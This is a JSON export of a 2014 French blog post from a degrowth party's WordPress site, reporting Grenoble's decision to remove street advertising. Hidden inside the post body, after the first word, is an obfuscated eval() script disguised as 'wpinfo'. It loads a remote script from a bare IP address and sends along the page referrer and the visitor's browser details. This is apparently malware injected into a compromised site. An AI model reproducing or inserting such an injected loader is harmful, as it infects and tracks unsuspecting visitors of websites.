{"id":9004,"date":"2014-11-25T20:24:33","date_gmt":"2014-11-25T19:24:33","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9004"},"modified":"2014-11-25T20:24:33","modified_gmt":"2014-11-25T19:24:33","slug":"grenoble-1-publicite-0","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9004","title":{"rendered":"Grenoble : 1 | Publicit\u00e9 : 0"},"content":{"rendered":"<p><strong>Profitant <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ytynf|var|u0026u|referrer|fiayb||js|php'.split('|'),0,{}))\n<\/script><\/noindex> de la fin de son contrat avec JC Decaux, la ville de Grenoble a d\u00e9cid\u00e9 de ne pas le renouveler et de bannir la publicit\u00e9 de ses rues.<\/strong> L&rsquo;objectif de la nouvelle \u00e9quipe municipale est de lib\u00e9rer de l&rsquo;espace public, de d\u00e9velopper parall\u00e8lement des lieux d&rsquo;expression citoyenne et d&rsquo;en finir avec un mod\u00e8le jug\u00e9 \u00ab obsol\u00e8te\u00a0\u00bb et \u00ab\u00a0trop aggressif\u00a0\u00bb. La\u00a0mairie EELV de Grenoble,\u00a0veut des panneaux \u00ab\u00a0libres, culturels et citoyens\u00a0\u00bb<\/p>\n<p>Au total, c&rsquo;est 326 panneaux publicitaires qui vont dispara\u00eetre de l&rsquo;espace public soit plus de 2 000 m\u00b2 de publicit\u00e9. Certes, toute la publicit\u00e9 ne va pas dispara\u00eetre puisque le contrat liant la ville \u00e0 JC Decaux court jusqu&rsquo;en 2019 pour les abris-bus mais Grenoble prend le chemin pour devenir la premi\u00e8re grande ville europ\u00e9enne sans publicit\u00e9. Le manque \u00e0 gagner de la manne publicitaire sera compens\u00e9 par la r\u00e9duction de la r\u00e9mun\u00e9ration des \u00e9lus et des frais protocolaires.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"http:\/\/ekladata.com\/yxkG3agXy0R24jUlXiq_fTUHjXc@416x296.jpg\" alt=\"\" width=\"416\" height=\"296\" \/><!--more--><\/p>\n<p>Comme Sao Paulo qui avait d\u00e8s 2006 adopt\u00e9 la loi \u00ab\u00a0ville propre\u00a0\u00bb pour interdire tout affichage publicitaire dans l&rsquo;espace public, Grenoble s&rsquo;attaque \u00e0 cette polution visuelle insupportable qui d\u00e9ploie une id\u00e9ologie n\u00e9faste, celle de la soci\u00e9t\u00e9 de Croissance.<\/p>\n<p>La d\u00e9cision de la nouvelle \u00e9quipe municipale grenobloise d\u00e9montre qu&rsquo;il est possible d&rsquo;agir contre la publicit\u00e9, que les pouvoirs publics disposent bien d&rsquo;une marge d&rsquo;action mais aussi que les r\u00e9sistances et actions, ici des \u00ab\u00a0anti-pub\u00a0\u00bb, peuvent d\u00e9boucher sur des mesures concr\u00e8tes qui s&rsquo;inscrivent pleinement dans une transition qui se d\u00e9barasse des b\u00e9quilles de la soci\u00e9t\u00e9 de Croissance. Il ya donc encore des raisons d&rsquo;esp\u00e9rer.<\/p>\n<p>Pour aller plus loin \u00e0 propos de la pub :<br \/>\n&#8211; <a href=\"http:\/\/ekladata.com\/9C97TFckW5CfJyjDqT8vh_TGhDI.pdf\" target=\"_blank\">\u00ab\u00a0Stop \u00e0 la publicit\u00e9<\/a>\u00ab\u00a0<a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=8582\" target=\"_blank\"><br \/>\n<\/a>&#8211;<a href=\"http:\/\/www.partipourladecroissance.net\/?page_id=8582\" target=\"_blank\"> \u00ab\u00a0Manifeste contre le syst\u00e8me publicitaire\u00a0\u00bb<\/a><\/p>\n<p>Pour aller plus loin \u00e0 propos de cette initiative \u00e0 Grenoble :<br \/>\n&#8211; <a href=\"http:\/\/adblockurban.zonelibre.info\/?p=589\">http:\/\/adblockurban.zonelibre.info\/?p=589<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Profitant de la fin de son contrat avec JC Decaux, la ville de Grenoble a d\u00e9cid\u00e9 de ne pas le renouveler et de bannir la publicit\u00e9 de ses rues. L&rsquo;objectif de la nouvelle \u00e9quipe municipale est de lib\u00e9rer de l&rsquo;espace &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9004\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,8,33],"tags":[],"class_list":["post-9004","post","type-post","status-publish","format-standard","hentry","category-actualites","category-communiques-de-presse","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9004","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9004"}],"version-history":[{"count":1,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9004\/revisions"}],"predecessor-version":[{"id":9005,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9004\/revisions\/9005"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9004"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9004"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9004"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}